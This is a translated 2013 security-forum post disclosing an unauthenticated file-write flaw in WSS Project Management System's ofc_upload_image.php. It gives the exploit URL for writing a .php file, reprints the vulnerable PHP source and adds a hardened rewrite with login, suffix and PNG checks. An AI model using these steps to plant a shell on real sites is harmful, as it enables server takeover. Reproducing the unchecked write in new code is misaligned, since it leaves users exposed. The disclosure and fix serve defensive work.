中国网络渗透测试联盟

Title: WSS Project Management System POST get shell

Author: admin    Time: 2013-2-23 12:38
Title: WSS Project Management System POST get shell
POST data vulnerability: the vulnerable file writes the raw POST body to a file with any suffix.
Vulnerable file: /chart/php-ofc-library/ofc_upload_image.php

Exploitation:
/chart/php-ofc-library/ofc_upload_image.php?name=hfy.php   (hfy.php is the file name)

POST arbitrary data
Saved location: http://localhost/chart/tmp-upload-images/hfy.php
The latest WSS release ships this vulnerable file; even the paid version has it, as does the demo deployed in the Sina app store~
<?php

//
// In Open Flash Chart -> save_image debug mode, you
// will see the 'echo' text in a new window.
//

/*

print_r( $_GET );
print_r( $_POST );
print_r( $_FILES );

print_r( $GLOBALS );
print_r( $GLOBALS["HTTP_RAW_POST_DATA"] );

*/
// default path for the image to be stored //
$default_path = '../tmp-upload-images/';

if (!file_exists($default_path)) mkdir($default_path, 0777, true);

// full path to the saved image including filename //
// NOTE: the file name comes straight from the query string; there is no
// login check and no extension check before it is used.
$destination = $default_path . basename( $_GET[ 'name' ] );

echo 'Saving your image to: '. $destination;
// print_r( $_POST );
// print_r( $_SERVER );
// echo $HTTP_RAW_POST_DATA;

//
// POST data is usually string data, but we are passing a RAW .png
// so PHP is a bit confused and $_POST is empty. But it has saved
// the raw bits into $HTTP_RAW_POST_DATA
//

// NOTE: the raw request body is written to disk unchanged, without any
// check that it is actually image data.
$jfh = fopen($destination, 'w') or die("can't open file");
fwrite($jfh, $HTTP_RAW_POST_DATA);
fclose($jfh);

//
// LOOK:
//
exit();
//
// PHP5:
//


// default path for the image to be stored //
$default_path = 'tmp-upload-images/';

if (!file_exists($default_path)) mkdir($default_path, 0777, true);

// full path to the saved image including filename //
$destination = $default_path . basename( $_FILES[ 'Filedata' ][ 'name' ] );

// move the image into the specified directory //
if (move_uploaded_file($_FILES[ 'Filedata' ][ 'tmp_name' ], $destination)) {
    echo "The file " . basename( $_FILES[ 'Filedata' ][ 'name' ] ) . " has been uploaded;";
} else {
    echo "FILE UPLOAD FAILED";
}


?>
Fix:
This vulnerable file is just a tragedy. How to fix it: add permission checks, suffix validation and the like~ Do it yourself.

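As an added example (not WSS's or Open Flash Chart's own code), here is the save_image branch above rewritten with the three checks the fix note asks for: a login check, a file-name suffix check, and a check that the body really is a PNG. It assumes the application stores the logged-in user's id in $_SESSION['user_id'] (a hypothetical key name).

```php
<?php
// Hardened replacement for the save_image branch (added example, not the
// project's own code). Assumes a logged-in user id in $_SESSION['user_id']
// (hypothetical key name).
session_start();
if (empty($_SESSION['user_id'])) {          // 1. permission check: no anonymous writes
    http_response_code(403);
    exit('login required');
}

$default_path = '../tmp-upload-images/';
if (!is_dir($default_path)) {
    mkdir($default_path, 0755, true);       // no world-writable upload directory
}

// 2. suffix check: a plain name ending in .png, so name=hfy.php or any path
//    component is rejected before it reaches the file system
$name = isset($_GET['name']) ? $_GET['name'] : '';
if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\.png\z/', $name)) {
    http_response_code(400);
    exit('invalid file name');
}

// $HTTP_RAW_POST_DATA was removed in PHP 7; php://input yields the same raw body.
// Read at most 2 MiB + 1 byte so an oversized body can be detected and refused.
$max = 2 * 1024 * 1024;
$data = file_get_contents('php://input', false, null, 0, $max + 1);
if ($data === false || strlen($data) > $max) {
    http_response_code(413);
    exit('image too large');
}

// 3. content check: the body must start with the PNG signature, so a script
//    posted under a .png name is rejected as well
if (substr($data, 0, 8) !== "\x89PNG\r\n\x1a\n") {
    http_response_code(400);
    exit('not a PNG image');
}

$destination = $default_path . $name;
if (file_put_contents($destination, $data, LOCK_EX) === false) {
    http_response_code(500);
    exit("can't write file");
}
echo 'Saving your image to: ' . $destination;
```

Pair this with a web server rule that refuses to execute scripts under tmp-upload-images, so that even a bypass of the name check cannot turn an upload into code execution.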
Welcome to 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2